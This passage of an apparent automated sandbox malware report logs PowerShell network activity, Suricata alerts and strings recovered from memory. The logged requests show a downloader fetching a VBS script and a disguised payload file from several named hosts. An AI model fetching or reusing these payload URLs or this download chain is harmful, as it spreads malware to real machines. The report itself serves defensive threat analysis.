          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 148.251.114.233 148.251.114.233
          Source: Joe Sandbox ViewASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 148.251.114.233:443
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /wh/List%20of%20required%20items%20and%20services.pdf HTTP/1.1Host: www.fornid.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ov/wh.vbs HTTP/1.1Host: www.pineappletech.aeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.info
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.almrwad.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /wh/Sarothrum.jpb HTTP/1.1Host: www.erp-royal-crown.infoConnection: Keep-Alive
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: src="https://www.facebook.com/tr?id=&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
          Source: global trafficDNS traffic detected: DNS query: www.fornid.com
          Source: global trafficDNS traffic detected: DNS query: www.pineappletech.ae
          Source: global trafficDNS traffic detected: DNS query: www.erp-royal-crown.info
          Source: global trafficDNS traffic detected: DNS query: www.almrwad.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:38:19 GMTServer: ApacheP3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"Set-Cookie: PrestaShop-a30a9934ef476d11b6cc3c983616e364=rMDVJJyqzbUxb1uFCvyiskbISKkTmQkL1lNdBd32jy%2F4fxnTX%2FMSpEfZIoqrX%2BXqP6DO2Fqc%2BBFZkXxuDpMJZBMCBalW%2FAKWOU2%2FeAFzTBk%3D000075; expires=Wed, 25-Dec-2024 09:38:19 GMT; Max-Age=1728000; path=/; domain=www.fornid.com; httponlyUpgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:38:29 GMTserver: LiteSpeedalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:38:35 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:38:42 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:38:48 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:38:54 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:38:59 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:05 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:11 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:23 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:35 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:41 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:46 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:39:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:39:58 GMTserver: LiteSpeed
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Dec 2024 09:40:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 05 Dec 2024 09:40:10 GMTserver: LiteSpeed
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C0D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.com
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://almrwad.comp
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://blog.fornid.com/
          Source: powershell.exe, 00000003.00000002.2219212023.000001DACF81F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mX
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C2330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C15CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901AFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB8199000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 00000000.00000002.2400652057.000002391006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400652057.00000239101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2216082915.000001DAC7780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D058F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000000.00000002.2327446000.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C0D59000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.almrwad.com
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C2330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C15CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.erp-royal-crown.info
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901AFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com/content/13-international-shipments
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901F73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.pineappletech.ae
          Source: powershell.exe, 00000000.00000002.2327446000.0000023900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0521000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB793A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000003.00000002.2190793958.000001DAB8D46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Archivo
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Istok
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000000.00000002.2327446000.0000023900C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB8D46000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB8199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2190793958.000001DAB7DBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000000.00000002.2400652057.000002391006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2400652057.00000239101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2216082915.000001DAC7780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D058F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3482512250.00000263D06D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.c
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.co
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C195D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1684000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C14EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/w
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/S
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sa
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sar
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Saro
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sarot
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Saroth
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sarothr
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sarothru
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sarothrum
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sarothrum.
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sarothrum.j
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sarothrum.jp
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.almrwad.com/wh/Sarothrum.jpb
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.i
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.in
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.inf
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1C21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C074E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C116E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C11E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C09F3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0B10000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C18E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1FD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1727000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C0DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/w
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/S
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sa
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sar
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Saro
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sarot
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Saroth
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothr
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothru
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum.
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum.j
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum.jp
          Source: powershell.exe, 00000007.00000002.3388724978.00000263C1CDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.3388724978.00000263C1E2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.erp-royal-crown.info/wh/Sarothrum.jpb
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901632000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/133-occhiali-protettivi
          Source: powershell.exe, 00000000.00000002.2327446000.0000023901B22000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2327446000.0000023901B1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.fornid.com/144-filtri-per-maschere
